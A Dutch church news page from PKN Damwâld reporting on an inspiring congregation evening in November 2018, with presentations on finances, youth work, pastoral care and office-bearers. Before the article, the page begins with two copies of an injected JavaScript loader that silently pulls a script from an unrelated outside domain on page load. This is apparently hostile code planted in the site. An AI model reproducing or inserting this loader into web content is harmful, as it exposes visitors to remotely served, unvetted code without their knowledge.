;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Inspirerende gemeenteavond Hervormd Akkerwoude ! - PKN Damwâld

Inspirerende gemeenteavond Hervormd Akkerwoude !

Gepubliceerd op: donderdag 29 november 2018

Op woensdag 28 november was ’t Skûlplak het toneel van een interessante, maar vooral ook een opbouwende, inspirerende gemeenteavond. De talrijk aanwezige gemeenteleden werden door de kerkenraad op een vlotte wijze op de hoogte gebracht van de (financiële-) handel en wandel van onze gemeente. De werkzaamheden en taakstelling van de kerkrentmeesters, het jeugdwerk en het pastoraat werden elk in een overzichtelijke presentatie op boeiende wijze belicht. Nieuw in onze gemeente is qua pastoraat de inzet van wijkassistenten en de personele ondersteuning van de scriba. Uiteraard blijft een actieve(re) rol van de gemeenteleden hierbij van eminent belang. In veranderende tijden waarin steeds meer appel gedaan wordt op jongeren is het belangrijk dat ouders volop betrokken zijn op het jeugdwerk. Daarbij is het belangrijk dat zij hun kinderen stimuleren in hun verbondenheid aan de gemeente en betrokken zijn als ouders op elkaar. In dat kader deed KingKids-leiding een dringende oproep voor nieuwe leidinggevenden. Enthousiaste vrijwilligers zijn van cruciaal belang. Weten wat er leeft en het geloof op een aansprekende manier weten over te dragen, maken het verschil. Uiteraard werd er gesproken over het beleid van de kerkenraad en de toekomst van de gemeente. Verrassend was zeer zeker de leuke kennisquiz waarmee de diaconie niet alleen meer inzicht in haar taakstelling wilde geven, maar zich ook wilde positioneren als een aantrekkelijke ‘keuzemogelijkheid’ voor potentiële ambtsdragers. De aanwezigen werden bovendien ‘getrakteerd’ op een indrukwekkende presentatie van drie (jonge-) ambtsdragers die elk vertelden over zijn/haar beweegreden om ambtsdrager te worden en hoe het ‘ambtswerk in de kerk’ daarbij wordt ervaren.
Het mooie van een dergelijke gemeenteavond is dat je (weer) mag ‘ontdekken’ dat er naast alle betrokkenheid en positiviteit er binnen onze gemeente een sterke wilskracht bestaat om samen één mooie en levendige geloofsgemeenschap te vormen, die geworteld in Gods liefde en met oog voor elkaar en de wereld. Ja, het is heel bijzonder dat je elkaar op deze manier zo mag ontmoeten en je mag laten inspireren!